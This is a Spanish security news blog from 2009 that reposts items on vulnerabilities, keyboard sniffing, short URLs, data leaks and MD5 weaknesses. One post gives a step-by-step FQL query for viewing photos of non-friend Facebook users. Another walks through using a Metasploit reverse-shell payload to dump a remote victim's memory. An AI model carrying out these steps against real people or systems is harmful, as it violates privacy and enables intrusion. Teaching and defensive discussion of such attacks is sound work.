Roel Schouwenberg, analista de Kaspersky Lab, afirmó que es cada vez más común que los cibercriminales bloqueen el acceso a sus sitios, no sólo para evitar que lo descubran las autoridades y empresas de seguridad, sino también para evitar ser víctimas de otros cibercriminales que quieren robar sus redes.

Fuente: http://www.viruslist.com/sp/news?id=208274367

jueves, 25 de junio de 2009

Falla crítica de Adobe Shockwave afecta a millones

El Adobe Shockwave Player contiene una vulnerabilidad crítica que podría ser explotada por atacantes remotos para tomar control total de computadoras Windows, según informa una advertencias del fabricante de software.

La falla afecta al Adobe Shockwave Player 11.5.0.596 y versiones anteriores. Detalles del boletín de Adobe:

Esta vulnerabilidad le permitiría a un atacante que explotara exitosamente la vulnerabilidad, el tomar control del sistema afectado. Adobe ha provisto de una solución para la vulnerabilidad informada(CVE-2009-1860). Este problema fue resuelto previamente en Shockwave Player 11.0.0.465; la actualización Shockwave Player 11.5.0.600 resuelve una variación del modo de compatibilidad del problema con el contenido de Shockwave Player 10. Para resolver este problema, los usuarios Windows de Shockwave Player deben desinstalar las versiones 11.5.0.596 de Shockwave y las anteriores de sus sistemas, e instalar Shockwave versión 11.5.0.600, disponible aquí: http://get.adobe.com/shockwave/. Esta falla es explotable de forma remota.

Fuente: http://blog.segu-info.com.ar/2009/06/falla-critica-de-adobe-shockwave-afecta.html

martes, 16 de junio de 2009

'Sniffer' de teclado inalámbrico de Microsoft de 27Mhz

Investigadores de Remote-Exploit.org, el hogar de la distribución Linux de la herramienta de pen-testing BackTrack, recientemente han liberado en fuente abierto el sniffer de teclado inalámbrico Keykeriki, capaz de captar y decodificar lo que se teclea en teclados Microsoft de 27Mhz mediante decifrado al vuelo del cifrado basado en XOR.

Su prueba de concepto de wartyping -decodificar señales de teclados inalámbricos - está basado en un documento de investigación publicado por el grupo hace un año y medio atrás:

"Ahora, 1 año y medio después de publicar nuestro documento 'Reporte del Análisis de teclados de 27Mhz' sobre las inseguridades de los teclados inalámbricos, estamos orgullosos de presentar el programa de captura de teclados inalámbricos: Keykeriki. Este proyecto opensource de hardware y software permite que cualquier persona verifique el nivel de seguridad de las trasmisiones de su propio teclado, y/o demostrar los ataques de escuchas (solo con propósitos educativos). El hardware en si mismo es diseñado para ser pequeño y versátil, puede ser extendido para el tráfico de teclado actualmente no detectado/desconocido, y/o extensiones de hardware, por ejemplo, un módulo repetidor o amplificador."

Según sus diapositivas, les toma aproximadamente entre 20 a 50 pulsaciones de tecla para recuperar exitosamente la clave de cifrado, lo cual no debe ser una sorpresa teniendo en cuenta el uso de cifrado XOR.

Por otra parte, los investigadores no están en conocimiento de ninguna posibilidad de parchar los teclados de 27Mhz afectados, y señalan que mientras que la solución “Secure Connect" de Logitech es de hecho el agregado de una capa adicional de cifrado, ellos tienen la intención de incluir la capacidad de decifrado en versiones futuras del Keykeriki,junto con la inspección de dispositivos inalámbricos de 2.4Ghz e inyección de pulsado de teclas en los teclados afectados.

¿Momento de tener un teclado con cable? No necesariamente, ya que otras investigaciones también probaron que los teclados con cable también son susceptibles a ataques de escucha. Las implicaciones potenciales de seguridad y el abuso potencial, son muy evidentes. Sin embargo, vale la pena señalar que con o sin Keykeriki, la economía de escala centrada en la grabación de lo tecleado en forma masiva y el secuestro de sesiones con propósitos fraudulentos, continuará sucediendo por los canales habituales - las redes bot y el software criminal.

Fuente: http://blogs.zdnet.com/security/?p=3597

lunes, 8 de junio de 2009

URLs cortas y sus problemas de seguridad

Los servicios para acortar las URLs se están volviendo cada vez más populares en las redes sociales, en especial en Twitter. Cuando se debe limitar un mensaje a sólo 140 caracteres, cada carácter adquiere importancia y publicar enlaces a búsquedas en Google o sitios de noticias puede fácilmente llenar un mensaje de Twitter.

Por supuesto, cada problema tiene una solución, así que los servicios para acortar URLs como TinyURL, IS.gd y Bit.ly están ofreciendo acortar las URLs de forma gratuita para que redirijan a las más largas. Todo parece maravilloso hasta el momento en el que comienzo a pensar en seguridad y varios problemas vienen a mi mente.

La ingeniería social se simplifica. El usuario no necesita ver la URL de la página que va a visitar, sólo la versión corta, que por lo general no ofrece pista alguna sobre el destino final del enlace. Un atacante puede decir que está dirigiendo a "fotos adorables de conejitos blancos", pero en su lugar envíar al usuario a un sitio web con contenido nocivo.

La fiabilidad es dudosa. Para llegar al destino final, no solo se necesita encontrar el servidor de destino, sino también que el servicio para acortar URLs funcione correctamente. Los problemas de fiabilidad con TinyURL son lo que hizo que hace poco Twitter cambiara a esta empresa por Bit.ly.

La confianza puede ser un problema. Lo único que quiere el usuario es pulsar en un enlace seguro, y ahora no sólo tiene que confiar en la persona que le envía el enlace, sino también el intermediario: el servicio para acortar URLs.

Cada vez es más común escuchar sobre los problemas de seguridad de estos servicios y me complace ver que los medios de comunicación se están comenzando a dar cuenta de ellos y están tratando de advertir a sus lectores sobre sus peligros: hace poco, AP publicó un artículo (en inglés) sobre los servicios para acortar URLs que también menciona sus problemas de seguridad

Fuente: http://blog.segu-info.com.ar/2009/06/urls-cortas-grandes-problemas.html

miércoles, 3 de junio de 2009

Ver las fotos de cualquier usuario en Facebook

En Geek The Planet han publicado un método que permite visualizar las fotos de cualquier usuario de Facebook aunque no sea nuestro amigo en la red.

El proceso es sencillo, aquí voy a explicar cómo obtener el acceso a las fotos, resumiendo el tutorial de Geek The Planet, y cómo evitarlo por medio de las opciones de privacidad...

1- Loguearnos en Facebook.
2- Accedemos a la sección para desarrolladores, clic aquí.
3- En el panel izquierdo seleccionamos Facebook PHP Cliente y fql.query.
4- En el cuadro de texto que hay debajo de query, escribimos el siguiente código, donde las XXX serán el ID del usuario que queremos ver:

SELECT name, link
FROM album

WHERE owner=XXX


Ver fotos Facebook
El ID se encuentra en la URL de los perfiles, por ejemplo, podríamos usar Google para encontrarlo:

Fotos Facebook
5-
Completados todos los campos, hacemos clic en Método de llamada y sobre la derecha se desplegarán los álbumes a los cuales podemos acceder:

ID facebook
Lo interesante de esto es que podremos ver las fotos de otra persona sin la necesidad de agregarla como contacto.


¿Cómo evitar que puedan ver nuestras fotos de esta forma?
.

En primer lugar deberíamos de tener cuidado a la hora de aceptar nuevos amigos, pero en relación al método antes explicado todo dependerá del nivel de privacidad establecido en los álbumes de fotos.

Para modificar estas configuraciones debemos acceder a nuestra sección de Fotos y luego a Privacidad del álbum.

Fotos privacidad facebook
En la nueva ventana podremos modificar la privacidad de nuestras fotos, seleccionando la opción Sólo mis amigos evitaremos que cualquiera las pueda ver y cómo la misma opción lo indica, sólo nuestros amigos podrán tener acceso a ellas.

Solo miagos facebook
También podemos utilizar el resto de las opciones de configuración, todo dependerá del nivel de privacidad que se quiera tener. Obviamente la opción Todos, permitirá que cualquiera vea las fotos y por lo tanto se recomienda no utilizarla.

Fuente: http://spamloco.net/2009/06/ver-las-fotos-de-cualquiera-en-facebook.html

viernes, 29 de mayo de 2009

Vulnerabilidad en Orange.fr expone los datos de 245,000 usuarios

La gente de HackersBlog ha publicado una breve entrada en la que comentan que el sitio web de la operadora móvil francesa, Orange.fr, tiene una gravísima vulnerabilidad de inyección SQL que deja expuesto los datos de más de 245,000 cuentas asociados al sitio. Entre los datos, se incluye el nombre y apellido de la persona registrada, correo electrónico, y su contraseña (sí, en texto plano).

El gran problema es que muchos usuarios suelen utilizar la misma contraseña para todos los servicios. Y en este caso, queda a la vista de cualquier atacante la contraseña y el correo electrónico de miles de usuarios. Muy grave.

El equipo de HackersBlogs ya ha dado aviso sobre este problema a la operadora, sin embargo, de momento no han recibido ninguna respuesta. Esperemos que los de Orange estén muy ocupados mejorando la seguridad de su sitio web.

Fuente: http://www.hackersblog.org/2009/05/25/orange-is-so-cool/

jueves, 7 de mayo de 2009

Robo de memoria en pcs remotos

¡¡ Atraco limpio a la memoria !!



Hace días atrás, dando un curso explique a los alumnos la manera de obtener los datos de la memoria de un equipo sin tocarlo ni acceder fisicamente a el.

Esto suscito muchas controversias a raíz de si es 'legal' de cara a una evidencia la forma de acceso y obtención de estos datos.

Este proceso que voy a explicar es solo una prueba de concepto ya publicada por la universidad de Michigan para obtener datos volatiles (netstat, variables, etc.) y en la que he añadido en mi caso la obtención de un volcado de memoria

También comentar que para la obtención de datos de la memoría debería de estar autorizado por el propietario de la máquina a la que se va a acceder.

POC

La prueba consiste en explotar una vulnerabilidad en una máquina y extraer el contenido de su memoria.

Para apoyarme en ese ejemplo reproduje lo siguiente:

He utilizado como víctima un Windows XP SP2 virtualizado (con vmware) y con el navegador IE7 abierto en una sesión de FaceBook. Este Windows tiene el defecto de no estar actualizado con el parche MS09-002 'Memory Corruption Exploit' clasificado como crítico por Microsoft. Para más información en la web de Microsoft aquí.

En la máquina atacante he utilizado Metasploit y la utilidad MDD.exe de Mantech (Podría haber seleccionado cualquiera de las existentes). Está utilidad esta liberada bajo licencia GPL y permite obtener volcados de memoria a disco con los sistemas operativos Windows 2000, Windows XP, Windows 2003 Server y Windows 2008 Server.

Metasploit es un proyecto open source de seguridad informática que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración y en el desarrollo de firmas para Sistemas de Detección de Intrusos. Su subproyecto más conocido es el Metasploit Framework, una herramienta para desarrollar y ejecutar exploits contra una máquina remota

Los pasos que he seguido son los siguientes:

Primero he ejecutado el framework de metasploit utilizando mertepreter.

El meterpreter es un conjunto de plugins avanzados que tienen como característica fundamental su que todo es cargado en la memoria del sistema sin crear ningún proceso adicional y permite la inyección dinámica de dll’s.

En este caso y dando por sentado que sabeis manejarse con Metasploit, solo hay que seleccionar el payload de la familia meterpreter y en caso necesario modificar las opciones del payload elegido.

Para el curso y su práctica he utilizado una simple shell (windows/meterpreter/shell_reverse_tcp).

Una vez seleccionado lo lanzamos con este resultado...


Despues de lanzar el exploit y recibir la conexión reversa, nos limitamos ha subir el fichero MDD.exe al equipo de la vitima



Luego ejecutamos el MDD.EXE y creamos una copia de la memoria al fichero copiadeldisco.dd



Por último nos descargamos a nuestra máquina el fichero resultante



Como se puede apreciar el proceso es sencillo e ilegal si no disponemos del consentimiento del usuario. La acción por el uso de Metasploit(u otra herramienta de hacking) es ilegal y penada por nuestras leyes (España) desde el punto de vista que 'atacamos' una máquina que no es de nuestra propiedad.

En la prueba indicar que el uso de Metasploit puede dejar (cosa que en mi caso no ocurrio) la memoria corrupta o la máquina en un estado 'variablemente raro' por lo que se recomienda el reinicio de esta.

Una vez disponemos del fichero podemos analizarlo tal y como comente en los post anteriores con las distintas herramientas de analisis de memoria como por ejemplo del framework volatility

Fuente: http://conexioninversa.blogspot.com/2009/03/atraco-limpio-la-memoria.html


martes, 24 de marzo de 2009

Verisign Ofrece Recomendaciones Para Protegerse De Los Ataques Man-in-the-middle

Debido al nuevo tipo de ataque man-in-the-middle revelado en la conferencia Black Hat D.C., VeriSign ofrece consejos sencillos que los usuarios finales y las empresas pueden utilizar para acabar en forma efectiva con las amenazas en línea.

El ataque mencionado es MITM, en el cual el usuario sufre un engaño y es llevado al sitio web incorrecto. Las técnicas más comunes para engañar a los visitantes incluyen correos electrónicos de phishing, sitios inalámbricos falsos y, más recientemente, el ataque a servidores DNS no seguros. Utiliza un servidor fraudulento para interceptar las comunicaciones entre el navegador del usuario y un sitio web legítimo, y luego funciona como proxy, capturando información confidencial por HTTP (no HTTPS) entre el navegador y el servidor fraudulento.

Lo que hace que este ataque sea diferente de los ataques MITM anteriores es que el sitio fraudulento intenta aprovechar señales visuales falsas, reemplazando el ícono favorito del sitio fraudulento por un ícono del candado, que tradicionalmente se identifica como una señal visual de sitio protegido con SSL. Sin embargo, si bien este ardid puede reproducir el candado, no puede recrear el indicador HTTPS legítimo o el color verde aún más evidente de la barra de direcciones en los navegadores web de alta seguridad, en los que el sitio está protegido con un Certificado EV SSL (Extended Validation Secure Socket Layer).

VeriSign ofrece a los usuarios finales y a las empresas los siguientes consejos:

Usuarios finales:
  • Los ataques man-in-the-middle y de phishing que se encuentran en la actualidad se pueden combatir a través de los Certificados EV SSL y prestando atención cuando falta el brillo o color verde. Los Certificados EV SSL confirman en forma definitiva la identidad de la organización que posee el sitio web. Los criminales informáticos no tienen acceso a los Certificados EV SSL de los sitios que falsifican y, por lo tanto, no pueden imitar el color verde que muestra que un sitio web autenticado es seguro.
  • Descargue la última versión de los navegadores web de alta seguridad, como Internet Explorer 7 o versión superior, FireFox 3 o versión superior, Google Chrome, Safari u Opera.
  • Aproveche los dispositivos de autenticación como los tokens y otras formas de autenticación con dos factores para cuentas confidenciales.
  • Trate los correos electrónicos que reciba de remitentes desconocidos con un alto grado de escepticismo y no haga clic en enlaces para obtener acceso a sitios seguros (escriba la dirección del sitio en el navegador).
Empresas:
  • Coloque el Certificado SSL EV en su página de inicio y en cualquier otra página donde se realice una transacción segura.
  • No ofrezca logins en páginas que todavía no están en una sesión SSL.
  • Ofrezca autenticación con dos factores a los clientes como una forma opcional de agregar otro nivel de seguridad cuando se obtiene acceso a las cuentas.
  • No incluya enlaces en los correos electrónicos que envíe a clientes y pídales que descarguen la última versión de sus navegadores de su preferencia.
"Aunque los criminales informáticos estuvieron utilizando Certificados SSL de autenticación baja en los ataques tipo phishing y man-in-the-middle durante años, la presentación en la conferencia de seguridad Black Hat es un buen recordatorio para que los usuarios finales estén alertas cuando realizan transacciones en línea", dijo Tim Callan, vicepresidente de marketing de producto de VeriSign. “Las amenazas de seguridad se presentan de muchas maneras, y estar un paso adelante requiere capacitación por parte de los usuarios finales y un enfoque de seguridad completa y en capas por parte de los sitios web para garantizar que los usuarios tengan una experiencia segura".

Fuente: http://blog.segu-info.com.ar/2009/03/como-protegerse-de-los-ataques-man-in.html

martes, 17 de febrero de 2009

Maestrosdelweb y Forosdelweb, robadas a su autor.

Christian van der Henst, dueño de maestrosdelweb.com y forosdelweb.com ha sido víctima de un ciberdelito que ha provocado la pérdida de ambos dominios.

Al parecer, Christian perdió sus cuentas de Facebook, Gmail y los delincuentes fueron capaces de ursurpar también sus dominios. En este momento ambas webs aparecen en mantenimiento e incluyen un anuncio a una web externa.

En el whois de los dominios aparecen datos falsos por lo que la búsqueda puede complicarse. El robo ambas páginas ha alarmado a los internautas y además ha generado cientos de entradas en blogs que apoyan a Christian y solicitan al registrador Godaddy que tome medidas.

Se pueden conocer más detalles desde el Twitter de Christian. Aunque de momento no ha trascendido mucha información, parece que las autoridades están trabajando en el caso y esperamos que su autor pueda recuperar sus páginas lo antes posible.

La ley de la jungla en Internet

Este tipo de delitos son muy difíciles de perseguir sobre todo porque suelen estar implicados varios países. En España la mayoría de los registradores solicitan un acta notarial para transferir un dominio, sin embargo conviene tomar una serie de precauciones para evitar este tipo de problemas.

Consejos:

- No utilizar las mismas contraseñas para correo, redes sociales o servicios como dominios, alojamientos.. etc

- Utilizar conexiones seguras y extremar las precauciones en WiFis públicas

- Protección del PC para evitar Keyloggers o malware que pueda comprometer nuestros datos.

Fuente: http://www.adslzone.net/article2705-maestrosdelweb--y-forosdelweb-robadas-a-su-autor.html


viernes, 13 de febrero de 2009

Microsoft ofrece 250.000 U$S por el autor de Conficker

Microsoft anunció una asociación con los líderes de la industria de tecnología y el mundo académico para aplicar un enfoque coordinado y dar respuesta mundial a las infecciones del gusano Conficker (alias Downadup).

Junto con investigadores de seguridad, ICANN, operadores de DNSs y ShadowServer, Microsoft diseñó una respuesta coordinada para deshabilitar dominios orintados a propagar variantes de Conficker. Microsoft también anunció una recompensa de 250.000 dólares a quien aporte información que resulte en el arresto y condena de los responsables de poner en marcha la Conficker en Internet.

Fuente: http://blog.segu-info.com.ar/

domingo, 8 de febrero de 2009

Google Latitude, nuevo servicio de localización de contactos

Este servicio de Google Maps, permite compartir tu posición geográfica y conocer la de tus contactos en tiempo real en los 27 paises en los que ofrece cobertura.


Latitude es una nueva funcionalidad con la que acceder a la localización de nuestros contactos, ya sea desde el móvil o desde nuestro ordenador.

La versión para móviles está disponible para sistemas Symbian S60, Windows Mobile y dispositivos BlackBerry, además de publicarse próximamente una versión de Android y otra para el iPhone.

Para disponer de este nuevo servicio en nuestro ordenador es necesario ir a iGoogle a través de este enlace, agregar el gadget de Latitude, además de disponer de una cuenta y tener instalado Google Gears en el navegador.

Google Latitude ha puesto especial atención en la protección de la privacidad por ello permite controlar con quien compartimos nuestra posición contacto a contacto, el grado de precisión en nuestra localización, además de poder desactivar el sistema en el momento que queramos.

Latitude es además, el primer paso de Google en la creación de una red social móvil con localización de contactos.

Fuente: http://www.desarrolloweb.com

sábado, 7 de febrero de 2009

Backtrack 4 beta

Próximamente podremos disfrutar de una nueva versión de Backtrack y esta vendrá con cambios significativos con respecto a las anteriores. En su Blog podremos ver todos los detalles y cambios de esta nueva versión aunque para abrir boca expondré aquí algunos de ellos, los que he creido mas importantes desde mi punto de vista.

1- Podremos instalarla como una distro estandar (cambio importante puesto que hasta ahora todas eran live cd)
2- Han migrado al sistema Debian de empaquetado y se usaran los repositorios de Ubuntu ademas de los de Backtrack
3- Actualización de Drivers para Wifi

Aqui podeis ver unas imagenes de Backtrack4 Beta:

http://www.offensive-security.com/bt4/01.png
http://www.offensive-security.com/bt4/02.png
http://www.offensive-security.com/bt4/03.png
http://www.offensive-security.com/bt4/04.png
http://www.offensive-security.com/bt4/05.png
http://www.offensive-security.com/bt4/06.png
http://www.offensive-security.com/bt4/07.png

...Tic,Tac,Tic,Tac..

miércoles, 4 de febrero de 2009

Windows7 adelanta su salida al 2009

Recogimos el soplo hace un año: Windows 7 adelantaba su salida al 2009, en lugar del 2010 inicialmente previsto. Claro que por aquel entonces aún quedaban un par de desinformados que pretendían negar lo evidente: el fracaso de Vista y la necesidad urgente de sustituirlo.

Hoy mismo Microsoft confirma su intención de quemar etapas. La beta de Windows 7 que hemos probado (Build 7000) será la única beta que cataremos. De ahí a sólo una versión RC (candidata a publicación) hacia agosto, o sea, justo antes de que caduque la beta. De esa RC (con período de caducidad prolongado) a la versión definitiva para fabricantes y después a las tiendas.

Fuente: www.kriptopolis.org

lunes, 2 de febrero de 2009

Herramientas para descubrir si los ISP nos limitan el P2P

Las redes P2P son un "aparente problema" para los ISP (Proveedores de servicio de Internet) los cuales siempre niegan rotundamente que estén filtrando, limitando o bloqueando este tipo de servicios. El hecho es que estas medidas adoptadas por los ISP's no son legales e incluso se les oculta al usuario final y si alguien se pone pesado siempre se justifican con el mismo argumento, "Tenemos que garantizar la calidad del servicio y los usuarios de P2P son minoritarios y perjudican a otros" (permitanme que les diga que eso es mentira) ¿Porque? pues porque simplemete no quieren invertir mas en infraestructuras y es mas barato limitar el ancho de banda de los usuarios que utilizan P2P que gastarse los € en ampliaciones.

Así que Google ha presentado Measurement Lab (M-Lab), una plataforma abierta que permitirá a desarrolladores elaborar herramientas orientadas a la medición de Internet.

Las herramientas en cuestión son:

  • Network Diagnostic Tool (NDT): Un test de velocidad de suba y descarga que determina si la conexión fue limitada. Diferencia problemas de las configuraciones de la computadora o en la infraestructura de la red.

  • Glasnost: Es una aplicación de de Java que ayuda a detectar si el proveedor filtra algún tipo de tráfico. Sirve para probar el filtrado de BitTorrent.

  • Network Path and Application Diagnosis (NPAD): Una herramienta que diagnostica los problemas más comunes en el desempeño de la red.
Todo es cuestión de probarlas y ver que realmente nos limitan el ancho de banda cuando se trata de P2P.

Por: Admin

jueves, 29 de enero de 2009

M-Lab -Herramienta contra el filtrado y bloqueo de la red-

«Google, New America Foundation, PlanetLab Consortium y personal académico dedicado a la investigación han anunciado el lanzamiento de Measurement Lab, o MLab, mediante una entrada de Vinton Cerf y Stephen Stuart en el blog oficial de Google. M-Lab tiene como objetivo aportar más transparencia a la actividad de la Red, permitiendo utilizar instrumentos de medición de Internet y compartir los datos para evidenciar las violaciones de la neutralidad de la red por parte de los proveedores de acceso. Por ahora, M-Lab dispone de tres instrumentos de diagnóstico: Uno para determinar si la red BitTorrent está siendo bloqueada, otro para diagnosticar posibles problemas de fuerte impacto en las redes de banda ancha y otro para diagnosticar los problemas que limitan la velocidad

Fuente: http://barrapunto.com/articles/09/01/29/1117240.shtml

martes, 27 de enero de 2009

Windows 7 ¿Sucesor de XP?

Bueno tengo que decir que WINDOWS7
me ha gustado y que la Beta a día de hoy esta resultando muy satisfactoria lo dicen incluso en sitios donde Linux es sagrado...es muy posible que cuando esta nueva versión esta algo mas depurada compita con XP (con vista no tiene ni que medirse puesto que esta prácticamente muerto....y lo estará mas aun, si no al tiempo) al parecer se puede incluso instalar en un PC relativamente antiguo puesto que no necesita muchos recursos del sistema, ademas las primeras pruebas indican que en aprox..25 minutos ya lo tienes instalado, cosa que no hace ni su hermano mayor Winxp.

Otro dato a tener en cuenta es que Microsoft ha confirmado que Windows7 estará disponible también para Ultraportatiles(algo como el Windows-Movile para las Pocket PC) esto nos lleva definitivamente a que Windows7 podria ser un digno sucesor de Windows xp.

PD: Linux tendrá que ponerse las pilas -Ahora si que si-.

lunes, 26 de enero de 2009

Compra un reproductor MP3 cargado con archivos secretos del Ejército de EE UU

* El aparato le costó 18 dólares en una tienda de Oklahoma.
* En los archivos que contenía aparece la advertencia de que la divulgación de su contenido está prohibida por la Ley federal.

Un neozelandés compró en una tienda de Estados Unidos un MP3 que, sin saberlo, contenía 60 archivos con secretos del Ejército estadounidense, según ha informado el canal de televisión One News de Nueva Zelanda.

"Cuanto más lo miraba, más veía cosas que no debería ver", explicó Chris Ogle, de 29 años, cuando examinó el reproductor que está dispuesto a entregárselo al Departamento de Defensa de EEUU si lo piden.

Entre las cosas que descubrió en el aparato, por el que pagó 18 dólares (13,9 euros) en un comercio de Oklahoma (EEUU), destaca una lista con nombres de militares norteamericanos en Afganistán. Otro documento ofrece información privada de personal, incluido el número de seguridad social o, si la soldado es mujer, si está embarazada.

Una carpeta contiene el inventario de equipo en campamentos militares y otro detalla los números de teléfonos móviles de personar que estuvieron destinadas en Irak y Afganistán. One News dijo que marcó algunos números de teléfono y que funcionaban.

En los archivos aparece la advertencia de que la divulgación de su contenido está prohibida por la Ley federal, según la información del canal de televisión.

Fuente: EFE y www.20minutos.es

MD5 ¡¡Vulnerable¡¡

Con la penúltima prueba de concepto contra MD5 vuelve el debate sobre su uso, aunque me temo que no va a revolver muchas conciencias pese a lo mediático de utilizar la PlayStation3 para los cálculos.


Hace unos meses, con la excusa del libro, Sergio me invitó a hacer de reportero dicharachero, e hice las preguntas para varias de las entrevistas que aparecen. Entre ellas una a Bruce Schneier que viene al pelo para estos días:


Hispasec: Aunque el algoritmo MD5 se considera "muerto" en términos criptográficos, vemos que aun sigue vigente en muchos sistemas y soluciones de seguridad. ¿Por qué parece que cuesta tanto migrar a algoritmos más seguros? ¿Falta de conciencia?


Bruce Schneier: MD5 hace tiempo que fue reemplazado por SHA. SHA ha sido oficialmente reemplazado por SHA-1. Y SHA-1 ha sido oficialmente reemplazado por la familia de algoritmos SHA-2. Éstos serán reemplazados sobre 2012 por SHA-3, un algoritmo todavía por determinar. La National Institute of Standards and Technology mantiene un concurso para elegirlo. Estoy orgulloso de mi propia propuesta para este proceso, llamada Skein (madeja).


Así que todo el que todavía esté usando MD5, o bien no está prestando atención o no le preocupa actualizarse. Y ese es el problema con sistemas heredados: están estancados con seguridad que estaba bien cuando se crearon pero que ya no son adecuadas.


Es normal que a pie de calle ocurra lo que dice Schneier, que la gente no preste atención a este tipo de cosas. Lo preocupante es que en la propia industria aun lo sigamos utilizando, y ésto es así porque no se han visto explotaciones en el mundo real más allá de las pruebas de concepto. Un caso típico de uso de MD5 lo podemos encontrar a la hora de identificar ficheros de malware. Por ejemplo, cualquier empresa de seguridad que nos pide una muestra de VirusTotal nos suele dar como referencia el MD5, tampoco son pocos los antispyware y otras herramientas de seguridad de renombre que lo utilizan. Pese a que conocemos sus debilidades, lo seguimos arrastrando como estándar de facto.


En VirusTotal, hará cosa de un año, migramos internamente todo a SHA-256, aunque en el interfaz público sigue apareciendo MD5 como primer hash seguido de SHA-1, SHA-256 y, el para mí overkill, SHA-512. Recuerdo que me entraron prisas con la migración tras ver otra prueba de concepto de colisiones MD5, en esa ocasión aplicada a binarios.


Esa prueba de concepto fue motivo de discusión entre gente del mundillo antivirus, ya que el MD5 seguía siendo el estándar aunque sólo fuera para la gestión interna de las muestras de malware. Por las conversaciones que puede mantener, parece que no causó tanta preocupación como a mí. En parte tenía cierta lógica porque la prueba de concepto requiere que el "atacante" genere y/o modifique los dos ficheros que quiera hacer coincidir su MD5. Así que no era posible, por ejemplo, que alguien generara un malware cuyo MD5 coincidiera con un kernel32.dll original de Microsoft.


Mi preocupación no venía tanto por el uso de MD5 para identificar malware (sigue siendo efectivo a día de hoy), sino el ataque a un esquema donde se utilice la generación de listas de goodware y malware, que es un poco por donde van ahora los tiros en la industria AV. Ahí si es mortal que alguien genere 2 ficheros con el mismo MD5, uno goodware y otro malware, y que distribuya primero el goodware a los laboratorios antivirus. El análisis saldría limpio y el fichero entraría a formar parte de su lista de goodware. A partir de ahí el atacante podría usar el malware asociado que sería identificado como confiable por los laboratorios y/o herramientas que utilizaran identificación de goodware por MD5.


Aun no se han identificado o publicitado ataques reales de malware utilizando esta técnica, pero estoy convencido de que el día que se haga será la puntilla que destierre definitivamente al MD5 (y sin necesidad de utilizar la PlayStation).

Fuente: http://blog.hispasec.com/laboratorio/